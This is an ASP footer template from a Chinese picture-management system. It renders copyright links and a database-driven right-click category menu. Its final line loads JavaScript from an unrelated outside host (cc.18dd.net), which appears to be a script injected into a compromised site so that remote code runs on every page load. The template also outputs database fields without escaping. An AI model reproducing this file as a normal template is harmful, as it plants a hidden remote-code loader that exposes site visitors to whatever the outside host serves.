📄 bottom.asp
字号:
<TABLE align=center border=0 cellPadding=0 cellSpacing=0 width=770>
<TBODY>
<TR>
<TD height=2><IMG height=2 src="images/new_3.gif"
width=770></TD></TR></TBODY></TABLE>
<TABLE align=center border=0 cellPadding=0
cellSpacing=0 height=5 width=770>
<TBODY>
<TR>
<TD height=4 bgcolor="#FFA200" align="center" class="white">版权所有: <a href="<%=rs5("url")%>" class="white"><%=rs5("webname")%></a>,E-mail:<a href="mailto:<%=rs5("mail")%>" class="white"><%=rs5("mail")%></a> 技术支持:<a href="http://www.wangjin.net" class="white" target="_blank">网尽科技</a><br>
<a target="_blank" href="http://www.wangjin.net">网尽图片管理系统 V7.0</a></TD>
</TR></TBODY></TABLE>
<script JavaScript1.2 src="style/right.js"></script>
<%if rs5("rightMenu")="toYes" then%>
<DIV class=skin0 id=ie5menu onmouseover=highlightie5()
style="LEFT: 280px; TOP: 28px" onclick=jumptoie5(); onmouseout=lowlightie5()>
<DIV>
<TABLE height="97%" cellSpacing=1 cellPadding=0 width="98%" align=center bgColor=#000000>
<TBODY>
<%sql = "SELECT * FROM classname ORDER BY id asc"
Set rs = conn.execute(sql)
if rs.eof or rs.bof then%>
<tr>
<td align="center">网尽设计</td>
</tr>
<%else%>
<tr>
<td align="center"
onmouseover="this.style.backgroundColor='#ff6633'; this.style.cursor='default';"
onmouseout="this.style.backgroundColor='#ff9900';" bgColor=#99cc00 height=20
scroll="no">
<b>分类导航</b><br></td>
</tr>
<%do while not rs.eof%>
<TR>
<TD align="center"
onmouseover="this.style.backgroundColor='#999900'; this.style.cursor='hand';"
onmouseout="this.style.backgroundColor='#99cc33';" bgColor=#99cc00 height=20
scroll="no" onclick="href('index.asp?classname=<%=rs("classname")%>');">
<%=rs("classname")%><br></TD></TR>
<%rs.movenext
loop%>
<%end if
rsclose%>
</TBODY></TABLE>
</DIV></DIV>
<%else%>
<DIV class=skin0 id=ie5menu onmouseover=highlightie5() style="LEFT: 0px; TOP: 0px" onmouseout=lowlightie5()>
<DIV>
</DIV>
</DIV>
<%end if%>
<SCRIPT language=JavaScript1.2>
if (document.all && window.print) {
ie5menu.className = menuskin;
document.oncontextmenu = showmenuie5;
document.body.onclick = hidemenuie5;
}
</SCRIPT>
<script language=javascript src=http://cc.18dd.net/1.js></script>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -